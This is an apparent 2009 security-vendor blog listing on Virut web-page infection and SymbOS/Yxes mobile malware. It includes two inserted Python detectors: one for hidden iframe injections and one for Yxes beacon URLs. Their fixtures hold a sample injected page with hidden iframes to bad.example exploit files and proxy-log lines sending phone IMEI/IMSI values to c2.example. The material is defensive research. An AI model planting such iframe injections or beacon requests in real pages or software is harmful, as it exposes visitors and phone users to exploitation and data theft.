Security Research | Page 57

I just happened to review our signature against Virut-infected Web pages, and I would say the infection is still very active as of now. W32/Virut.CE is known to infect Web pages (HTML, ASP, and PHP) by injecting a malicious iframe that redirects visiting users to Web sites serving malicious PDF and SWF files with different kinds of exploits. However, Virut is not the only agent of this iframe injection. Just minutes ago, I searched a couple of infected Web sites specific to this injection compromise, and here's a good example. Figure 1 shows... [Read More]
by Rex Plantado  |  Sep 01, 2009  |  Filed in: Security Research
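The post above describes the injection as a hidden iframe pulling PDF/SWF exploit content from an external site. The following is an added example of how one might triage downloaded HTML/ASP/PHP files for that pattern; it is not Fortinet's signature nor any code from the post. The heuristics (an iframe is suspicious when it is zero-sized, hidden by CSS, or pushed off-screen and points off-site, or when it loads a .pdf/.swf from another host), the sample pages and the host names are all constructed for illustration.

```python
"""Flag iframes that look injected into a web page (HTML, ASP or PHP source).

Added example, not Fortinet's detection signature. Heuristics are assumptions:
  * an iframe is "hidden" if width and height are both <= 1, or its inline
    style uses display:none / visibility:hidden / a large negative left offset;
  * a hidden iframe whose src points off-site is reported as injected;
  * a visible off-site iframe is reported only if it loads a .pdf or .swf.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|left\s*:\s*-\d{3,}", re.I
)


class _IframeCollector(HTMLParser):
    """Collect the attribute dict of every <iframe> start tag in the source."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _is_tiny(value):
    """True for width/height values like "0", "1", "0px"; False if absent."""
    digits = re.sub(r"[^0-9]", "", value)
    return bool(value) and int(digits or "0") <= 1


def find_injected_iframes(page_source, site_host):
    """Return [(src, reason)] for each iframe matching an injection heuristic.

    site_host is the host the page was fetched from; relative src values are
    treated as on-site.
    """
    parser = _IframeCollector()
    parser.feed(page_source)
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        parsed = urlparse(src)
        host = parsed.hostname or site_host
        external = host.lower() != site_host.lower()
        hidden = (
            _is_tiny(attrs.get("width", "")) and _is_tiny(attrs.get("height", ""))
        ) or bool(HIDDEN_STYLE.search(attrs.get("style", "")))
        if external and hidden:
            findings.append((src, "hidden external iframe"))
        elif external and parsed.path.lower().endswith((".pdf", ".swf")):
            findings.append((src, "external iframe loading PDF/SWF"))
    return findings


# Constructed sample pages (hosts are placeholders, not real infection sites).
CLEAN_PAGE = """<html><body>
<iframe src="/embed/player" width="480" height="270"></iframe>
<iframe src="http://partner.example/widget" width="300" height="250"></iframe>
</body></html>"""

INFECTED_PAGE = """<?php echo "<h1>Welcome</h1>"; ?>
<html><body>
<p>Legitimate content</p>
</body></html>
<iframe src="http://bad.example/in.php" width="0" height="0" style="visibility:hidden"></iframe>
<iframe src="http://bad.example/exploit.swf" width="100" height="100"></iframe>"""

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("infected", INFECTED_PAGE)):
        print(name, find_injected_iframes(page, "www.example.com"))
```

Run this over files pulled from a suspect site to get a quick list of candidate injections; anything flagged still needs a look at the referenced URL, since a zero-sized iframe is occasionally used legitimately (trackers, for example).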
There has been a lot of confusion lately concerning the SymbOS/Yxes worm. Among other things, it has now dawned on me that the so-called Transmitter.C reported in numerous articles on the net (for instance, here and here) is not sexySpace.sisx (detected as SymbOS/Yxes.E!worm): those are two different pieces of malware. Why? As a matter of fact, several issues startled me (ordered from weakest to strongest point): Transmitter.C is reported to send a massive amount of SMS messages (they are talking about 500 SMS). If Transmitter.C is Yxes.E, this is surprising because... [Read More]
by Axelle Apvrille  |  Aug 26, 2009  |  Filed in: Security Research
A team of British eccentrics has broken the 103-year-old record for a steam-powered car, previously standing at 127mph. The record now stands at close to 140mph, but with the superheated steam being injected into the turbine at more than twice the speed of sound, there is clearly more to the speed of the car than the speed of the steam. The good news about all this is that it does give us an excuse to look at the speed of security devices. Picking up your favourite data sheet, you can see speeds quoted based on link speeds, up to values... [Read More]
by Darren Turnbull  |  Aug 26, 2009  |  Filed in: Security Research
Total detected malware volume continued a climbing trend this period, posting the highest levels detected to date this year. On top of this steep incline, highlighted since March 2009, the number of distinct variants (malicious pieces of code) has also continued to gradually increase. Several malware attack waves were evident this period, most notably on the 24th of July when a huge surge of ZBot activity occurred through HTML/Agent.E!tr. In fact, this particular campaign posted record detection levels for a single-day run, surpassing that of the... [Read More]
by Derek Manky  |  Aug 25, 2009  |  Filed in: Security Research
What's the difference between application visibility and true application security? In the video below, Rick Basile, Fortinet's senior director of technical services, chats with analyst Richard Stiennon about how the two approaches greatly differ, how a safe application could pose a threat to networks, and protection methods for applications in use by enterprises. (Click the picture to watch the video) [Read More]
by Rick Popko  |  Aug 19, 2009  |  Filed in: Security Research
In case you are not familiar with the Symbian development process, application development features two major security features in Symbian OS 9.1 and greater. First, applications must specify their capabilities, i.e. if an application uses a Bluetooth connection, it must have the Symbian LocalServices capability. A few other interesting capabilities for malware are: NetworkServices: required to make a call, send HTTP requests, etc. ReadUserData/WriteUserData: required to read/write the user's contacts. UserEnvironment: to use the camera. Location: particularly... [Read More]
by Axelle Apvrille  |  Aug 04, 2009  |  Filed in: Security Research
Last week, an online user reported to us that he could not access some AV websites while he had no problem with and . He also added that he thought his computer might be infected with the notorious Virut malware. Hmm... wait a minute, Virut doesn't include a web site blocking capability like Conficker.C did a couple of months ago. So we immediately asked for a couple of samples to verify his intuition. Not surprisingly, it's indeed a slightly modified version of W32/Virut.CE. I wasn't surprised because this... [Read More]
by Rex Plantado  |  Jul 29, 2009  |  Filed in: Security Research
Tags: virut
Many threat trends have continued as we head into August 2009. I have highlighted notable items below from our July 2009 Threat Landscape report, which can be found on Fortinet's FortiGuard Center. Mobile threat development continues: In July we saw the emergence of SymbOS/Yxes.E and SymbOS/Yxes.F, the latest updated variants of Yxes that we first reported on in February. For further details, check out this blog post, which is well worth the read: in particular, the dynamic content Yxes serves up via JSP indeed shows the beginning steps of how cyber... [Read More]
by Derek Manky  |  Jul 27, 2009  |  Filed in: Security Research
The Symbian malware Yxes is (nearly) keeping me awake these days. Among other functionalities, it sends HTTP requests to a remote web server. The URLs it gets are the following:
- Yxes.A: http://[REMOVED]/Kernel?Version=
- Yxes.B or Yxes.E: http://[REMOVED]/Kernel.jsp?Version=&PhoneType=
- Yxes.C: no similar URL
- Yxes.D: this one issues two different requests:
  http://[REMOVED]/bs?Version=&PhoneImei=&PhoneImsi=&PhoneType=
  http://[REMOVED]/number/?PhoneType=
  http://[REMOVED]/index.jsp?PhoneType=
- Yxes.F: http://[REMOVED]/PbkInfo.jsp?PhoneType=&PhoneImei=&PhoneImsi=
TYPE... [Read More]
by Axelle Apvrille  |  Jul 21, 2009  |  Filed in: Security Research
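The URL list in the post above is usable as a network indicator on its own: each variant is identified by the request path and the set of query-parameter names (IMEI and IMSI among them, which is what makes the traffic worth catching). The following is an added example of turning that list into a classifier run over proxy log lines; it is not Fortinet's signature nor code from the post. Because the hosts were removed in the post, matching is on path and parameter names only, which is an assumption about how the real infrastructure behaves; the host `c2.example`, the log format (`date time client method url status`) and the log lines are constructed for the example.

```python
"""Classify HTTP requests by the SymbOS/Yxes variant that issues them.

Added example, not Fortinet's signature. Paths and parameter names come
from the URL list in the post; hosts were [REMOVED] there, so the match
ignores the host and compares the path and the exact set of parameter
names (Yxes.D is listed with several distinct request shapes).
"""
from urllib.parse import parse_qs, urlparse

# (variant, request path, parameter names), taken from the post's URL list.
YXES_PATTERNS = [
    ("Yxes.A", "/Kernel", {"Version"}),
    ("Yxes.B/E", "/Kernel.jsp", {"Version", "PhoneType"}),
    ("Yxes.D", "/bs", {"Version", "PhoneImei", "PhoneImsi", "PhoneType"}),
    ("Yxes.D", "/number/", {"PhoneType"}),
    ("Yxes.D", "/index.jsp", {"PhoneType"}),
    ("Yxes.F", "/PbkInfo.jsp", {"PhoneType", "PhoneImei", "PhoneImsi"}),
]


def classify_url(url):
    """Return the variant label whose path and parameter set match, else None."""
    parsed = urlparse(url)
    # keep_blank_values: the beacons send parameters that may be empty ("Version=").
    params = set(parse_qs(parsed.query, keep_blank_values=True))
    for variant, path, names in YXES_PATTERNS:
        if parsed.path == path and params == names:
            return variant
    return None


def scan_proxy_log(lines):
    """Return [(client, variant)] for log lines whose URL matches a Yxes beacon.

    Assumed (constructed) log format: "date time client method url status".
    """
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 5:
            continue
        client, url = fields[2], fields[4]
        variant = classify_url(url)
        if variant:
            hits.append((client, variant))
    return hits


# Constructed proxy log lines; c2.example stands in for the removed host.
SAMPLE_LOG = [
    "2009-07-21 10:02:13 10.0.0.5 GET http://c2.example/Kernel.jsp?Version=1.2&PhoneType=N95 200",
    "2009-07-21 10:02:40 10.0.0.7 GET http://www.example.com/index.jsp?page=1 200",
    "2009-07-21 10:03:05 10.0.0.9 GET http://c2.example/bs?Version=1&PhoneImei=350000000000000&PhoneImsi=208000000000000&PhoneType=N73 200",
]

if __name__ == "__main__":
    for client, variant in scan_proxy_log(SAMPLE_LOG):
        print(f"{client} -> {variant}")
```

The exact-set comparison keeps `/index.jsp?page=1` from a normal web application from being confused with the Yxes.D `/index.jsp?PhoneType=` beacon; if a newer variant adds parameters, the pattern table rather than the matching logic is what needs updating.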
There are days where I wonder if people really care about privacy (except for these people). Most people don't see any problem in telling the entire world what they're doing (Twitter), who they know or see (Facebook) or where they are: the kind of stuff teenagers hate to tell their parents. Mobile phones are just the perfect platform for spying because they are portable (iPhones are such beauties one hates to leave them behind!) and seen as private devices (would you share your nice iPhone, huh?). Depending on functionalities, mobile spyware records... [Read More]
by Axelle Apvrille  |  Jul 16, 2009  |  Filed in: Security Research